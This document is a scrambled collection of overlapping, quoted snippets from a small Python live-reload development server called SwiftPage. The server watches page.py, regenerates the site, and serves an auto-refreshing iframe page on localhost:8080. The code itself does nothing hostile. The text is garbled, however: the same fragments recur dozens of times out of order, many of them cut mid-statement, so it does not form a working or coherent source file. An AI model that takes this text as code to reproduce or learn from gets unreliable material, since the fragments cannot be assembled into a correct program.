print(\"SwiftPage server running, your site will now be", "SwiftPage generated: \"+str(last_modified_time)) # refreshes web browser and writes other commands commands =", "as httpd: # opens web browser of local server webbrowser.open('http://127.0.0.1:8080/dev_server.html', new=0, autoraise=True) print(\"SwiftPage", "(var i = 0; i < lines.length; i++) { //console.log(lines[i]); // TODO: remove", "!== lines[i]) { lastRefreshToken = lines[i]; var iframe = document.getElementsByName('content_window')[0]; iframe.src = iframe.src", "{ console.log('Commands file does not exist.'); } }); } function checkForCommands() { var", "customHandler # http.server.SimpleHTTPRequestHandler t1 = threading.Thread(target=main_loop) t2 = threading.Thread(target=addons_loop) with socketserver.TCPServer((\"\", port), handler)", "other commands commands = open(\".swiftpage_commands\",\"w\") commands.write(str(last_modified_time)) commands.close() else: # empties commands commands =", "= customHandler # http.server.SimpleHTTPRequestHandler t1 = threading.Thread(target=main_loop) t2 = threading.Thread(target=addons_loop) with socketserver.TCPServer((\"\", port),", "iframe.src = iframe.src iframe.contentWindow.location.reload(true); //iframe.location.reload(true); } } } } else { console.log('Commands file", "lastRefreshToken = lines[i]; var iframe = document.getElementsByName('content_window')[0]; iframe.src = iframe.src iframe.contentWindow.location.reload(true); //iframe.location.reload(true); }", "autoraise=True) print(\"SwiftPage server running, your site will now be automatically regenerated when changes", "# defines custom HTTP handler class customHandler(http.server.SimpleHTTPRequestHandler): def log_message(self, format, *args): return #", "# removes existing commands file os.remove(\".swiftpage_commands\") # creates dev_server.html dev_server_page = open(\"dev_server.html\",\"w\") dev_server_page.write(dev_page)", "dev_server_page.write(dev_page) dev_server_page.close() # defines custom HTTP handler class customHandler(http.server.SimpleHTTPRequestHandler): def log_message(self, format, *args):", "//iframe.location.reload(true); } } } } else { console.log('Commands file does not exist.'); }", "exist.'); } }); } function checkForCommands() { var filename = '.swiftpage_commands'; loadCommands(filename); }", "= open(\"dev_server.html\",\"w\") dev_server_page.write(dev_page) dev_server_page.close() # defines custom HTTP handler class customHandler(http.server.SimpleHTTPRequestHandler): def log_message(self,", "(lastRefreshToken !== lines[i]) { lastRefreshToken = lines[i]; var iframe = document.getElementsByName('content_window')[0]; iframe.src =", "commands.close() else: # empties commands commands = open(\".swiftpage_commands\",\"w\") commands.write(\"\") commands.close() time.sleep(0.6) def addons_loop():", "last_modified_time != modified_time: last_modified_time = modified_time os.system('python create_page.py') print(\"Page modified, new SwiftPage generated:", "regenerated when changes are made\") # starts loops t1.start() t2.start() # serves html", "from page import * import http.server import socketserver last_modified_time = 0 dev_page_prefix =", "{ var filename = '.swiftpage_commands'; loadCommands(filename); } setInterval(checkForCommands, 30); </script> <body style='padding: 0px;", "style='width: 100%; height: 100%; outline: none;' frameborder='0'></iframe> </body> </html> ''' dev_page = dev_page_prefix+dev_page_middle+dev_page_suffix", "''')|$)/gm) for (var i = 0; i < lines.length; i++) { //console.log(lines[i]); //", "function checkForCommands() { var filename = '.swiftpage_commands'; loadCommands(filename); } setInterval(checkForCommands, 30); </script> <body", "last_modified_time = 0 dev_page_prefix = ''' <html> <title>SwiftPage Development Server</title> <script src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script> <script>", "</script> <body style='padding: 0px; margin: 0px;'> <iframe src='./site/index.html' name='content_window' style='width: 100%; height: 100%;", "port = 8080 handler = customHandler # http.server.SimpleHTTPRequestHandler t1 = threading.Thread(target=main_loop) t2 =", "<script src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script> <script> var lastRefreshToken = \"none\"; function loadCommands(filename) { $.get(filename, function(data, textStatus)", "return # starts web server port = 8080 handler = customHandler # http.server.SimpleHTTPRequestHandler", "web browser of local server webbrowser.open('http://127.0.0.1:8080/dev_server.html', new=0, autoraise=True) print(\"SwiftPage server running, your site", "necessary, saves new copy of swiftpage if last_modified_time != modified_time: last_modified_time = modified_time", "= open(\".swiftpage_commands\",\"w\") commands.write(str(last_modified_time)) commands.close() else: # empties commands commands = open(\".swiftpage_commands\",\"w\") commands.write(\"\") commands.close()", "threading.Thread(target=main_loop) t2 = threading.Thread(target=addons_loop) with socketserver.TCPServer((\"\", port), handler) as httpd: # opens web", "handler) as httpd: # opens web browser of local server webbrowser.open('http://127.0.0.1:8080/dev_server.html', new=0, autoraise=True)", "handler = customHandler # http.server.SimpleHTTPRequestHandler t1 = threading.Thread(target=main_loop) t2 = threading.Thread(target=addons_loop) with socketserver.TCPServer((\"\",", "starts web server port = 8080 handler = customHandler # http.server.SimpleHTTPRequestHandler t1 =", "custom HTTP handler class customHandler(http.server.SimpleHTTPRequestHandler): def log_message(self, format, *args): return # starts web", "import webbrowser import threading from addons.addons_server import * from page import * import", "var lines = data.match(/^.*((''' dev_page_middle = '\\\\'+'r'+'\\\\'+'n'+'|'+'\\\\'+'n'+'|'+'\\\\'+'r' dev_page_suffix = ''')|$)/gm) for (var i", "\"+str(last_modified_time)) # refreshes web browser and writes other commands commands = open(\".swiftpage_commands\",\"w\") commands.write(str(last_modified_time))", "file does not exist.'); } }); } function checkForCommands() { var filename =", "updated modified_time = os.path.getmtime(\"page.py\") # if necessary, saves new copy of swiftpage if", "your site will now be automatically regenerated when changes are made\") # starts", "not exist.'); } }); } function checkForCommands() { var filename = '.swiftpage_commands'; loadCommands(filename);", "changes are made\") # starts loops t1.start() t2.start() # serves html server httpd.serve_forever()", "iframe.src iframe.contentWindow.location.reload(true); //iframe.location.reload(true); } } } } else { console.log('Commands file does not", "//console.log(lines[i]); // TODO: remove if (lines[i] !== '' && lines[i] !== ' ')", "from addons.addons_server import * from page import * import http.server import socketserver last_modified_time", "see if files have been updated modified_time = os.path.getmtime(\"page.py\") # if necessary, saves", "t2 = threading.Thread(target=addons_loop) with socketserver.TCPServer((\"\", port), handler) as httpd: # opens web browser", "True: global last_modified_time # checks to see if files have been updated modified_time", "os.system('python create_page.py') print(\"Page modified, new SwiftPage generated: \"+str(last_modified_time)) # refreshes web browser and", "= \"none\"; function loadCommands(filename) { $.get(filename, function(data, textStatus) { if (textStatus == 'success')", "web server port = 8080 handler = customHandler # http.server.SimpleHTTPRequestHandler t1 = threading.Thread(target=main_loop)", "Development Server</title> <script src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script> <script> var lastRefreshToken = \"none\"; function loadCommands(filename) { $.get(filename,", "modified, new SwiftPage generated: \"+str(last_modified_time)) # refreshes web browser and writes other commands", "print(\"Page modified, new SwiftPage generated: \"+str(last_modified_time)) # refreshes web browser and writes other", "'' && lines[i] !== ' ') { if (lastRefreshToken !== lines[i]) { lastRefreshToken", "swiftpage if last_modified_time != modified_time: last_modified_time = modified_time os.system('python create_page.py') print(\"Page modified, new", "lines.length; i++) { //console.log(lines[i]); // TODO: remove if (lines[i] !== '' && lines[i]", "'\\\\'+'r'+'\\\\'+'n'+'|'+'\\\\'+'n'+'|'+'\\\\'+'r' dev_page_suffix = ''')|$)/gm) for (var i = 0; i < lines.length; i++)", "new copy of swiftpage if last_modified_time != modified_time: last_modified_time = modified_time os.system('python create_page.py')", "*args): return # starts web server port = 8080 handler = customHandler #", "} } } } else { console.log('Commands file does not exist.'); } });", "dev_page_prefix+dev_page_middle+dev_page_suffix addons_server = AddonsServer(page) def main_loop(): while True: global last_modified_time # checks to", "checks to see if files have been updated modified_time = os.path.getmtime(\"page.py\") # if", "be automatically regenerated when changes are made\") # starts loops t1.start() t2.start() #", "height: 100%; outline: none;' frameborder='0'></iframe> </body> </html> ''' dev_page = dev_page_prefix+dev_page_middle+dev_page_suffix addons_server =", "dev_page_suffix = ''')|$)/gm) for (var i = 0; i < lines.length; i++) {", "opens web browser of local server webbrowser.open('http://127.0.0.1:8080/dev_server.html', new=0, autoraise=True) print(\"SwiftPage server running, your", "loadCommands(filename); } setInterval(checkForCommands, 30); </script> <body style='padding: 0px; margin: 0px;'> <iframe src='./site/index.html' name='content_window'", "= ''' <html> <title>SwiftPage Development Server</title> <script src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script> <script> var lastRefreshToken = \"none\";", "webbrowser import threading from addons.addons_server import * from page import * import http.server", "import * import http.server import socketserver last_modified_time = 0 dev_page_prefix = ''' <html>", "{ if (textStatus == 'success') { var lines = data.match(/^.*((''' dev_page_middle = '\\\\'+'r'+'\\\\'+'n'+'|'+'\\\\'+'n'+'|'+'\\\\'+'r'", "{ lastRefreshToken = lines[i]; var iframe = document.getElementsByName('content_window')[0]; iframe.src = iframe.src iframe.contentWindow.location.reload(true); //iframe.location.reload(true);", "!== '' && lines[i] !== ' ') { if (lastRefreshToken !== lines[i]) {", "lines[i]) { lastRefreshToken = lines[i]; var iframe = document.getElementsByName('content_window')[0]; iframe.src = iframe.src iframe.contentWindow.location.reload(true);", "HTTP handler class customHandler(http.server.SimpleHTTPRequestHandler): def log_message(self, format, *args): return # starts web server", "time import webbrowser import threading from addons.addons_server import * from page import *", "commands = open(\".swiftpage_commands\",\"w\") commands.write(str(last_modified_time)) commands.close() else: # empties commands commands = open(\".swiftpage_commands\",\"w\") commands.write(\"\")", "commands commands = open(\".swiftpage_commands\",\"w\") commands.write(\"\") commands.close() time.sleep(0.6) def addons_loop(): global addons_server addons_server.on_update() #", "100%; outline: none;' frameborder='0'></iframe> </body> </html> ''' dev_page = dev_page_prefix+dev_page_middle+dev_page_suffix addons_server = AddonsServer(page)", "modified_time = os.path.getmtime(\"page.py\") # if necessary, saves new copy of swiftpage if last_modified_time", "= iframe.src iframe.contentWindow.location.reload(true); //iframe.location.reload(true); } } } } else { console.log('Commands file does", "commands commands = open(\".swiftpage_commands\",\"w\") commands.write(str(last_modified_time)) commands.close() else: # empties commands commands = open(\".swiftpage_commands\",\"w\")", "os.path.getmtime(\"page.py\") # if necessary, saves new copy of swiftpage if last_modified_time != modified_time:", "addons_loop(): global addons_server addons_server.on_update() # removes existing commands file os.remove(\".swiftpage_commands\") # creates dev_server.html", "customHandler(http.server.SimpleHTTPRequestHandler): def log_message(self, format, *args): return # starts web server port = 8080", "}); } function checkForCommands() { var filename = '.swiftpage_commands'; loadCommands(filename); } setInterval(checkForCommands, 30);", "t1 = threading.Thread(target=main_loop) t2 = threading.Thread(target=addons_loop) with socketserver.TCPServer((\"\", port), handler) as httpd: #", "} } else { console.log('Commands file does not exist.'); } }); } function", "= AddonsServer(page) def main_loop(): while True: global last_modified_time # checks to see if", "server webbrowser.open('http://127.0.0.1:8080/dev_server.html', new=0, autoraise=True) print(\"SwiftPage server running, your site will now be automatically", "writes other commands commands = open(\".swiftpage_commands\",\"w\") commands.write(str(last_modified_time)) commands.close() else: # empties commands commands", "page import * import http.server import socketserver last_modified_time = 0 dev_page_prefix = '''", "# starts web server port = 8080 handler = customHandler # http.server.SimpleHTTPRequestHandler t1", "* from page import * import http.server import socketserver last_modified_time = 0 dev_page_prefix", "= threading.Thread(target=addons_loop) with socketserver.TCPServer((\"\", port), handler) as httpd: # opens web browser of", "* import http.server import socketserver last_modified_time = 0 dev_page_prefix = ''' <html> <title>SwiftPage", "dev_page_prefix = ''' <html> <title>SwiftPage Development Server</title> <script src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script> <script> var lastRefreshToken =", "dev_page_middle = '\\\\'+'r'+'\\\\'+'n'+'|'+'\\\\'+'n'+'|'+'\\\\'+'r' dev_page_suffix = ''')|$)/gm) for (var i = 0; i <", "var iframe = document.getElementsByName('content_window')[0]; iframe.src = iframe.src iframe.contentWindow.location.reload(true); //iframe.location.reload(true); } } } }", "addons_server = AddonsServer(page) def main_loop(): while True: global last_modified_time # checks to see", "= document.getElementsByName('content_window')[0]; iframe.src = iframe.src iframe.contentWindow.location.reload(true); //iframe.location.reload(true); } } } } else {", "main_loop(): while True: global last_modified_time # checks to see if files have been", "dev_page = dev_page_prefix+dev_page_middle+dev_page_suffix addons_server = AddonsServer(page) def main_loop(): while True: global last_modified_time #", "document.getElementsByName('content_window')[0]; iframe.src = iframe.src iframe.contentWindow.location.reload(true); //iframe.location.reload(true); } } } } else { console.log('Commands", "{ var lines = data.match(/^.*((''' dev_page_middle = '\\\\'+'r'+'\\\\'+'n'+'|'+'\\\\'+'n'+'|'+'\\\\'+'r' dev_page_suffix = ''')|$)/gm) for (var", "!= modified_time: last_modified_time = modified_time os.system('python create_page.py') print(\"Page modified, new SwiftPage generated: \"+str(last_modified_time))", "dev_server.html dev_server_page = open(\"dev_server.html\",\"w\") dev_server_page.write(dev_page) dev_server_page.close() # defines custom HTTP handler class customHandler(http.server.SimpleHTTPRequestHandler):", "now be automatically regenerated when changes are made\") # starts loops t1.start() t2.start()", "# if necessary, saves new copy of swiftpage if last_modified_time != modified_time: last_modified_time", "if (lines[i] !== '' && lines[i] !== ' ') { if (lastRefreshToken !==", "function loadCommands(filename) { $.get(filename, function(data, textStatus) { if (textStatus == 'success') { var", "lines = data.match(/^.*((''' dev_page_middle = '\\\\'+'r'+'\\\\'+'n'+'|'+'\\\\'+'n'+'|'+'\\\\'+'r' dev_page_suffix = ''')|$)/gm) for (var i =", "&& lines[i] !== ' ') { if (lastRefreshToken !== lines[i]) { lastRefreshToken =", "= os.path.getmtime(\"page.py\") # if necessary, saves new copy of swiftpage if last_modified_time !=", "'.swiftpage_commands'; loadCommands(filename); } setInterval(checkForCommands, 30); </script> <body style='padding: 0px; margin: 0px;'> <iframe src='./site/index.html'", "# checks to see if files have been updated modified_time = os.path.getmtime(\"page.py\") #", "os.remove(\".swiftpage_commands\") # creates dev_server.html dev_server_page = open(\"dev_server.html\",\"w\") dev_server_page.write(dev_page) dev_server_page.close() # defines custom HTTP", "# refreshes web browser and writes other commands commands = open(\".swiftpage_commands\",\"w\") commands.write(str(last_modified_time)) commands.close()", "socketserver last_modified_time = 0 dev_page_prefix = ''' <html> <title>SwiftPage Development Server</title> <script src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script>", "i < lines.length; i++) { //console.log(lines[i]); // TODO: remove if (lines[i] !== ''", "commands file os.remove(\".swiftpage_commands\") # creates dev_server.html dev_server_page = open(\"dev_server.html\",\"w\") dev_server_page.write(dev_page) dev_server_page.close() # defines", "<iframe src='./site/index.html' name='content_window' style='width: 100%; height: 100%; outline: none;' frameborder='0'></iframe> </body> </html> '''", "commands.write(str(last_modified_time)) commands.close() else: # empties commands commands = open(\".swiftpage_commands\",\"w\") commands.write(\"\") commands.close() time.sleep(0.6) def", "handler class customHandler(http.server.SimpleHTTPRequestHandler): def log_message(self, format, *args): return # starts web server port", "<script> var lastRefreshToken = \"none\"; function loadCommands(filename) { $.get(filename, function(data, textStatus) { if", "= modified_time os.system('python create_page.py') print(\"Page modified, new SwiftPage generated: \"+str(last_modified_time)) # refreshes web", "} function checkForCommands() { var filename = '.swiftpage_commands'; loadCommands(filename); } setInterval(checkForCommands, 30); </script>", "defines custom HTTP handler class customHandler(http.server.SimpleHTTPRequestHandler): def log_message(self, format, *args): return # starts", "# http.server.SimpleHTTPRequestHandler t1 = threading.Thread(target=main_loop) t2 = threading.Thread(target=addons_loop) with socketserver.TCPServer((\"\", port), handler) as", "will now be automatically regenerated when changes are made\") # starts loops t1.start()", "import * from page import * import http.server import socketserver last_modified_time = 0", "var filename = '.swiftpage_commands'; loadCommands(filename); } setInterval(checkForCommands, 30); </script> <body style='padding: 0px; margin:", "while True: global last_modified_time # checks to see if files have been updated", "socketserver.TCPServer((\"\", port), handler) as httpd: # opens web browser of local server webbrowser.open('http://127.0.0.1:8080/dev_server.html',", "http.server.SimpleHTTPRequestHandler t1 = threading.Thread(target=main_loop) t2 = threading.Thread(target=addons_loop) with socketserver.TCPServer((\"\", port), handler) as httpd:", "modified_time os.system('python create_page.py') print(\"Page modified, new SwiftPage generated: \"+str(last_modified_time)) # refreshes web browser", "port), handler) as httpd: # opens web browser of local server webbrowser.open('http://127.0.0.1:8080/dev_server.html', new=0,", "addons.addons_server import * from page import * import http.server import socketserver last_modified_time =", "function(data, textStatus) { if (textStatus == 'success') { var lines = data.match(/^.*((''' dev_page_middle", "server running, your site will now be automatically regenerated when changes are made\")", "open(\".swiftpage_commands\",\"w\") commands.write(str(last_modified_time)) commands.close() else: # empties commands commands = open(\".swiftpage_commands\",\"w\") commands.write(\"\") commands.close() time.sleep(0.6)", "threading.Thread(target=addons_loop) with socketserver.TCPServer((\"\", port), handler) as httpd: # opens web browser of local", "= data.match(/^.*((''' dev_page_middle = '\\\\'+'r'+'\\\\'+'n'+'|'+'\\\\'+'n'+'|'+'\\\\'+'r' dev_page_suffix = ''')|$)/gm) for (var i = 0;", "= '.swiftpage_commands'; loadCommands(filename); } setInterval(checkForCommands, 30); </script> <body style='padding: 0px; margin: 0px;'> <iframe", "have been updated modified_time = os.path.getmtime(\"page.py\") # if necessary, saves new copy of", "browser and writes other commands commands = open(\".swiftpage_commands\",\"w\") commands.write(str(last_modified_time)) commands.close() else: # empties", "log_message(self, format, *args): return # starts web server port = 8080 handler =", "if necessary, saves new copy of swiftpage if last_modified_time != modified_time: last_modified_time =", "files have been updated modified_time = os.path.getmtime(\"page.py\") # if necessary, saves new copy", "open(\".swiftpage_commands\",\"w\") commands.write(\"\") commands.close() time.sleep(0.6) def addons_loop(): global addons_server addons_server.on_update() # removes existing commands", "running, your site will now be automatically regenerated when changes are made\") #", "textStatus) { if (textStatus == 'success') { var lines = data.match(/^.*((''' dev_page_middle =", "src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script> <script> var lastRefreshToken = \"none\"; function loadCommands(filename) { $.get(filename, function(data, textStatus) {", "' ') { if (lastRefreshToken !== lines[i]) { lastRefreshToken = lines[i]; var iframe", "= open(\".swiftpage_commands\",\"w\") commands.write(\"\") commands.close() time.sleep(0.6) def addons_loop(): global addons_server addons_server.on_update() # removes existing", "format, *args): return # starts web server port = 8080 handler = customHandler", "class customHandler(http.server.SimpleHTTPRequestHandler): def log_message(self, format, *args): return # starts web server port =", "name='content_window' style='width: 100%; height: 100%; outline: none;' frameborder='0'></iframe> </body> </html> ''' dev_page =", "} } } else { console.log('Commands file does not exist.'); } }); }", "generated: \"+str(last_modified_time)) # refreshes web browser and writes other commands commands = open(\".swiftpage_commands\",\"w\")", "def log_message(self, format, *args): return # starts web server port = 8080 handler", "httpd: # opens web browser of local server webbrowser.open('http://127.0.0.1:8080/dev_server.html', new=0, autoraise=True) print(\"SwiftPage server", "file os.remove(\".swiftpage_commands\") # creates dev_server.html dev_server_page = open(\"dev_server.html\",\"w\") dev_server_page.write(dev_page) dev_server_page.close() # defines custom", "data.match(/^.*((''' dev_page_middle = '\\\\'+'r'+'\\\\'+'n'+'|'+'\\\\'+'n'+'|'+'\\\\'+'r' dev_page_suffix = ''')|$)/gm) for (var i = 0; i", "time.sleep(0.6) def addons_loop(): global addons_server addons_server.on_update() # removes existing commands file os.remove(\".swiftpage_commands\") #", "if (textStatus == 'success') { var lines = data.match(/^.*((''' dev_page_middle = '\\\\'+'r'+'\\\\'+'n'+'|'+'\\\\'+'n'+'|'+'\\\\'+'r' dev_page_suffix", "AddonsServer(page) def main_loop(): while True: global last_modified_time # checks to see if files", "= 8080 handler = customHandler # http.server.SimpleHTTPRequestHandler t1 = threading.Thread(target=main_loop) t2 = threading.Thread(target=addons_loop)", "<body style='padding: 0px; margin: 0px;'> <iframe src='./site/index.html' name='content_window' style='width: 100%; height: 100%; outline:", "</body> </html> ''' dev_page = dev_page_prefix+dev_page_middle+dev_page_suffix addons_server = AddonsServer(page) def main_loop(): while True:", "import threading from addons.addons_server import * from page import * import http.server import", "if (lastRefreshToken !== lines[i]) { lastRefreshToken = lines[i]; var iframe = document.getElementsByName('content_window')[0]; iframe.src", "print(\"SwiftPage server running, your site will now be automatically regenerated when changes are", "{ //console.log(lines[i]); // TODO: remove if (lines[i] !== '' && lines[i] !== '", "0 dev_page_prefix = ''' <html> <title>SwiftPage Development Server</title> <script src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script> <script> var lastRefreshToken", "0; i < lines.length; i++) { //console.log(lines[i]); // TODO: remove if (lines[i] !==", "global addons_server addons_server.on_update() # removes existing commands file os.remove(\".swiftpage_commands\") # creates dev_server.html dev_server_page", "global last_modified_time # checks to see if files have been updated modified_time =", "lastRefreshToken = \"none\"; function loadCommands(filename) { $.get(filename, function(data, textStatus) { if (textStatus ==", "automatically regenerated when changes are made\") # starts loops t1.start() t2.start() # serves", "< lines.length; i++) { //console.log(lines[i]); // TODO: remove if (lines[i] !== '' &&", "def main_loop(): while True: global last_modified_time # checks to see if files have", "to see if files have been updated modified_time = os.path.getmtime(\"page.py\") # if necessary,", "loadCommands(filename) { $.get(filename, function(data, textStatus) { if (textStatus == 'success') { var lines", "TODO: remove if (lines[i] !== '' && lines[i] !== ' ') { if", "if last_modified_time != modified_time: last_modified_time = modified_time os.system('python create_page.py') print(\"Page modified, new SwiftPage", "$.get(filename, function(data, textStatus) { if (textStatus == 'success') { var lines = data.match(/^.*(('''", "</html> ''' dev_page = dev_page_prefix+dev_page_middle+dev_page_suffix addons_server = AddonsServer(page) def main_loop(): while True: global", "def addons_loop(): global addons_server addons_server.on_update() # removes existing commands file os.remove(\".swiftpage_commands\") # creates", "i = 0; i < lines.length; i++) { //console.log(lines[i]); // TODO: remove if", "8080 handler = customHandler # http.server.SimpleHTTPRequestHandler t1 = threading.Thread(target=main_loop) t2 = threading.Thread(target=addons_loop) with", "style='padding: 0px; margin: 0px;'> <iframe src='./site/index.html' name='content_window' style='width: 100%; height: 100%; outline: none;'", "0px; margin: 0px;'> <iframe src='./site/index.html' name='content_window' style='width: 100%; height: 100%; outline: none;' frameborder='0'></iframe>", "src='./site/index.html' name='content_window' style='width: 100%; height: 100%; outline: none;' frameborder='0'></iframe> </body> </html> ''' dev_page", "i++) { //console.log(lines[i]); // TODO: remove if (lines[i] !== '' && lines[i] !==", "checkForCommands() { var filename = '.swiftpage_commands'; loadCommands(filename); } setInterval(checkForCommands, 30); </script> <body style='padding:", "http.server import socketserver last_modified_time = 0 dev_page_prefix = ''' <html> <title>SwiftPage Development Server</title>", "if files have been updated modified_time = os.path.getmtime(\"page.py\") # if necessary, saves new", "== 'success') { var lines = data.match(/^.*((''' dev_page_middle = '\\\\'+'r'+'\\\\'+'n'+'|'+'\\\\'+'n'+'|'+'\\\\'+'r' dev_page_suffix = ''')|$)/gm)", "# opens web browser of local server webbrowser.open('http://127.0.0.1:8080/dev_server.html', new=0, autoraise=True) print(\"SwiftPage server running,", "import http.server import socketserver last_modified_time = 0 dev_page_prefix = ''' <html> <title>SwiftPage Development", "') { if (lastRefreshToken !== lines[i]) { lastRefreshToken = lines[i]; var iframe =", "server port = 8080 handler = customHandler # http.server.SimpleHTTPRequestHandler t1 = threading.Thread(target=main_loop) t2", "= ''')|$)/gm) for (var i = 0; i < lines.length; i++) { //console.log(lines[i]);", "(textStatus == 'success') { var lines = data.match(/^.*((''' dev_page_middle = '\\\\'+'r'+'\\\\'+'n'+'|'+'\\\\'+'n'+'|'+'\\\\'+'r' dev_page_suffix =", "threading from addons.addons_server import * from page import * import http.server import socketserver", "!== ' ') { if (lastRefreshToken !== lines[i]) { lastRefreshToken = lines[i]; var", "import time import webbrowser import threading from addons.addons_server import * from page import", "= dev_page_prefix+dev_page_middle+dev_page_suffix addons_server = AddonsServer(page) def main_loop(): while True: global last_modified_time # checks", "<html> <title>SwiftPage Development Server</title> <script src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script> <script> var lastRefreshToken = \"none\"; function loadCommands(filename)", "open(\"dev_server.html\",\"w\") dev_server_page.write(dev_page) dev_server_page.close() # defines custom HTTP handler class customHandler(http.server.SimpleHTTPRequestHandler): def log_message(self, format,", "new=0, autoraise=True) print(\"SwiftPage server running, your site will now be automatically regenerated when", "= 0 dev_page_prefix = ''' <html> <title>SwiftPage Development Server</title> <script src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script> <script> var", "remove if (lines[i] !== '' && lines[i] !== ' ') { if (lastRefreshToken", "} setInterval(checkForCommands, 30); </script> <body style='padding: 0px; margin: 0px;'> <iframe src='./site/index.html' name='content_window' style='width:", "none;' frameborder='0'></iframe> </body> </html> ''' dev_page = dev_page_prefix+dev_page_middle+dev_page_suffix addons_server = AddonsServer(page) def main_loop():", "import socketserver last_modified_time = 0 dev_page_prefix = ''' <html> <title>SwiftPage Development Server</title> <script", "saves new copy of swiftpage if last_modified_time != modified_time: last_modified_time = modified_time os.system('python", "and writes other commands commands = open(\".swiftpage_commands\",\"w\") commands.write(str(last_modified_time)) commands.close() else: # empties commands", "addons_server.on_update() # removes existing commands file os.remove(\".swiftpage_commands\") # creates dev_server.html dev_server_page = open(\"dev_server.html\",\"w\")", "= threading.Thread(target=main_loop) t2 = threading.Thread(target=addons_loop) with socketserver.TCPServer((\"\", port), handler) as httpd: # opens", "# creates dev_server.html dev_server_page = open(\"dev_server.html\",\"w\") dev_server_page.write(dev_page) dev_server_page.close() # defines custom HTTP handler", "site will now be automatically regenerated when changes are made\") # starts loops", "commands.write(\"\") commands.close() time.sleep(0.6) def addons_loop(): global addons_server addons_server.on_update() # removes existing commands file", "does not exist.'); } }); } function checkForCommands() { var filename = '.swiftpage_commands';", "Server</title> <script src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script> <script> var lastRefreshToken = \"none\"; function loadCommands(filename) { $.get(filename, function(data,", "} }); } function checkForCommands() { var filename = '.swiftpage_commands'; loadCommands(filename); } setInterval(checkForCommands,", "commands = open(\".swiftpage_commands\",\"w\") commands.write(\"\") commands.close() time.sleep(0.6) def addons_loop(): global addons_server addons_server.on_update() # removes", "= 0; i < lines.length; i++) { //console.log(lines[i]); // TODO: remove if (lines[i]", "<title>SwiftPage Development Server</title> <script src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script> <script> var lastRefreshToken = \"none\"; function loadCommands(filename) {", "iframe = document.getElementsByName('content_window')[0]; iframe.src = iframe.src iframe.contentWindow.location.reload(true); //iframe.location.reload(true); } } } } else", "os import time import webbrowser import threading from addons.addons_server import * from page", "filename = '.swiftpage_commands'; loadCommands(filename); } setInterval(checkForCommands, 30); </script> <body style='padding: 0px; margin: 0px;'>", "modified_time: last_modified_time = modified_time os.system('python create_page.py') print(\"Page modified, new SwiftPage generated: \"+str(last_modified_time)) #", "commands.close() time.sleep(0.6) def addons_loop(): global addons_server addons_server.on_update() # removes existing commands file os.remove(\".swiftpage_commands\")", "outline: none;' frameborder='0'></iframe> </body> </html> ''' dev_page = dev_page_prefix+dev_page_middle+dev_page_suffix addons_server = AddonsServer(page) def", "browser of local server webbrowser.open('http://127.0.0.1:8080/dev_server.html', new=0, autoraise=True) print(\"SwiftPage server running, your site will", "# empties commands commands = open(\".swiftpage_commands\",\"w\") commands.write(\"\") commands.close() time.sleep(0.6) def addons_loop(): global addons_server", "// TODO: remove if (lines[i] !== '' && lines[i] !== ' ') {", "{ $.get(filename, function(data, textStatus) { if (textStatus == 'success') { var lines =", "existing commands file os.remove(\".swiftpage_commands\") # creates dev_server.html dev_server_page = open(\"dev_server.html\",\"w\") dev_server_page.write(dev_page) dev_server_page.close() #", "frameborder='0'></iframe> </body> </html> ''' dev_page = dev_page_prefix+dev_page_middle+dev_page_suffix addons_server = AddonsServer(page) def main_loop(): while", "when changes are made\") # starts loops t1.start() t2.start() # serves html server", "''' dev_page = dev_page_prefix+dev_page_middle+dev_page_suffix addons_server = AddonsServer(page) def main_loop(): while True: global last_modified_time", "last_modified_time # checks to see if files have been updated modified_time = os.path.getmtime(\"page.py\")", "dev_server_page.close() # defines custom HTTP handler class customHandler(http.server.SimpleHTTPRequestHandler): def log_message(self, format, *args): return", "(lines[i] !== '' && lines[i] !== ' ') { if (lastRefreshToken !== lines[i])", "lines[i] !== ' ') { if (lastRefreshToken !== lines[i]) { lastRefreshToken = lines[i];", "with socketserver.TCPServer((\"\", port), handler) as httpd: # opens web browser of local server", "100%; height: 100%; outline: none;' frameborder='0'></iframe> </body> </html> ''' dev_page = dev_page_prefix+dev_page_middle+dev_page_suffix addons_server", "var lastRefreshToken = \"none\"; function loadCommands(filename) { $.get(filename, function(data, textStatus) { if (textStatus", "console.log('Commands file does not exist.'); } }); } function checkForCommands() { var filename", "''' <html> <title>SwiftPage Development Server</title> <script src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script> <script> var lastRefreshToken = \"none\"; function", "copy of swiftpage if last_modified_time != modified_time: last_modified_time = modified_time os.system('python create_page.py') print(\"Page", "create_page.py') print(\"Page modified, new SwiftPage generated: \"+str(last_modified_time)) # refreshes web browser and writes", "= lines[i]; var iframe = document.getElementsByName('content_window')[0]; iframe.src = iframe.src iframe.contentWindow.location.reload(true); //iframe.location.reload(true); } }", "iframe.contentWindow.location.reload(true); //iframe.location.reload(true); } } } } else { console.log('Commands file does not exist.');", "for (var i = 0; i < lines.length; i++) { //console.log(lines[i]); // TODO:", "30); </script> <body style='padding: 0px; margin: 0px;'> <iframe src='./site/index.html' name='content_window' style='width: 100%; height:", "of local server webbrowser.open('http://127.0.0.1:8080/dev_server.html', new=0, autoraise=True) print(\"SwiftPage server running, your site will now", "} else { console.log('Commands file does not exist.'); } }); } function checkForCommands()", "dev_server_page = open(\"dev_server.html\",\"w\") dev_server_page.write(dev_page) dev_server_page.close() # defines custom HTTP handler class customHandler(http.server.SimpleHTTPRequestHandler): def", "= '\\\\'+'r'+'\\\\'+'n'+'|'+'\\\\'+'n'+'|'+'\\\\'+'r' dev_page_suffix = ''')|$)/gm) for (var i = 0; i < lines.length;", "lines[i]; var iframe = document.getElementsByName('content_window')[0]; iframe.src = iframe.src 